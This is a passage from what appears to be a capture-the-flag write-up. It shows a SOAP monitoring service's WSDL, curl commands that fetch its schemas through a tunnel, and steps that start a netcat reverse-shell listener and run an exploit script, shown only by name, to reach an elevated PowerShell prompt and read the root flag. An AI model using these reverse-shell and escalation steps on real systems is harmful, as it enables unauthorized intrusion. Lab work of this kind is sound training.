    xmlns:wsx="http://schemas.xmlsoap.org/ws/2004/09/mex"
    xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
    xmlns:wsa10="http://www.w3.org/2005/08/addressing"
    xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy"
    xmlns:wsap="http://schemas.xmlsoap.org/ws/2004/08/addressing/policy"
    xmlns:msc="http://schemas.microsoft.com/ws/2005/12/wsdl/contract"
    xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/"
    xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
    xmlns:wsam="http://www.w3.org/2007/05/addressing/metadata"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:tns="http://tempuri.org/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:wsaw="http://www.w3.org/2006/05/addressing/wsdl"
    xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
  <wsdl:types>
    <xsd:schema targetNamespace="http://tempuri.org/Imports">
      <xsd:import schemaLocation="schemas/xsd0.xsd" namespace="http://tempuri.org/"/>
      <xsd:import schemaLocation="schemas/xsd1.xsd" namespace="http://schemas.microsoft.com/2003/10/Serialization/"/>
    </xsd:schema>
  </wsdl:types>
  <wsdl:message name="IMonitoringService_StartMonitoring_InputMessage">
    <wsdl:part name="parameters" element="tns:StartMonitoring"/>
  </wsdl:message>
  <wsdl:message name="IMonitoringService_StartMonitoring_OutputMessage">
    <wsdl:part name="parameters" element="tns:StartMonitoringResponse"/>
  </wsdl:message>
  <wsdl:message name="IMonitoringService_StopMonitoring_InputMessage">
    <wsdl:part name="parameters" element="tns:StopMonitoring"/>
  </wsdl:message>
  <wsdl:message name="IMonitoringService_StopMonitoring_OutputMessage">
    <wsdl:part name="parameters" element="tns:StopMonitoringResponse"/>
  </wsdl:message>
  <wsdl:message name="IMonitoringService_KillProcess_InputMessage">
    <wsdl:part name="parameters" element="tns:KillProcess"/>
  </wsdl:message>
  <wsdl:message name="IMonitoringService_KillProcess_OutputMessage">
    <wsdl:part name="parameters" element="tns:KillProcessResponse"/>
  </wsdl:message>
  <wsdl:portType name="IMonitoringService">
    <wsdl:operation name="StartMonitoring">
      <wsdl:input wsaw:Action="http://tempuri.org/IMonitoringService/StartMonitoring" message="tns:IMonitoringService_StartMonitoring_InputMessage"/>
      <wsdl:output wsaw:Action="http://tempuri.org/IMonitoringService/StartMonitoringResponse" message="tns:IMonitoringService_StartMonitoring_OutputMessage"/>
    </wsdl:operation>
    <wsdl:operation name="StopMonitoring">
      <wsdl:input wsaw:Action="http://tempuri.org/IMonitoringService/StopMonitoring" message="tns:IMonitoringService_StopMonitoring_InputMessage"/>
      <wsdl:output wsaw:Action="http://tempuri.org/IMonitoringService/StopMonitoringResponse" message="tns:IMonitoringService_StopMonitoring_OutputMessage"/>
    </wsdl:operation>
    <wsdl:operation name="KillProcess">
      <wsdl:input wsaw:Action="http://tempuri.org/IMonitoringService/KillProcess" message="tns:IMonitoringService_KillProcess_InputMessage"/>
      <wsdl:output wsaw:Action="http://tempuri.org/IMonitoringService/KillProcessResponse" message="tns:IMonitoringService_KillProcess_OutputMessage"/>
    </wsdl:operation>
  </wsdl:portType>
  <wsdl:binding name="BasicHttpBinding_IMonitoringService" type="tns:IMonitoringService">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
    <wsdl:operation name="StartMonitoring">
      <soap:operation soapAction="http://tempuri.org/IMonitoringService/StartMonitoring" style="document"/>
      <wsdl:input><soap:body use="literal"/></wsdl:input>
      <wsdl:output><soap:body use="literal"/></wsdl:output>
    </wsdl:operation>
    <wsdl:operation name="StopMonitoring">
      <soap:operation soapAction="http://tempuri.org/IMonitoringService/StopMonitoring" style="document"/>
      <wsdl:input><soap:body use="literal"/></wsdl:input>
      <wsdl:output><soap:body use="literal"/></wsdl:output>
    </wsdl:operation>
    <wsdl:operation name="KillProcess">
      <soap:operation soapAction="http://tempuri.org/IMonitoringService/KillProcess" style="document"/>
      <wsdl:input><soap:body use="literal"/></wsdl:input>
      <wsdl:output><soap:body use="literal"/></wsdl:output>
    </wsdl:operation>
  </wsdl:binding>
  <wsdl:service name="MonitoringService">
    <wsdl:port name="BasicHttpBinding_IMonitoringService" binding="tns:BasicHttpBinding_IMonitoringService">
      <soap:address location="http://127.0.0.1:8000/MonitorService"/>
    </wsdl:port>
  </wsdl:service>
</wsdl:definitions>
Then fetch xsd0 and xsd1 through the tunnel into the schemas/ folder (quote the URLs so the shell does not treat ? as a glob):
curl -v -H "Accept: text/xml" 'http://127.0.0.1:8000/MonitorService?xsd=xsd0' -o schemas/xsd0.xsd
curl -v -H "Accept: text/xml" 'http://127.0.0.1:8000/MonitorService?xsd=xsd1' -o schemas/xsd1.xsd
STEP XX: Start the nc listener (rlwrap nc -lvnp 4446), then run the script. It needs the zeep package: create a virtual environment (python3 -m venv venv), activate it (source venv/bin/activate), pip install zeep, and run exploit.py from there.

The listener receives the connection and we get a PowerShell prompt:

STEP XXI: The shell runs with enough privilege to read the Administrator profile that was denied to sqlmgmt, so we go there for the root flag:
PS C:\Users\Administrator> cd desktop
PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/16/2025 5:00 PM 2308 Microsoft Edge.lnk
-ar--- 2/21/2026 5:14 AM 34 root.txt
PS C:\Users\Administrator\desktop> type root.txt
<--------Root-Flag------------>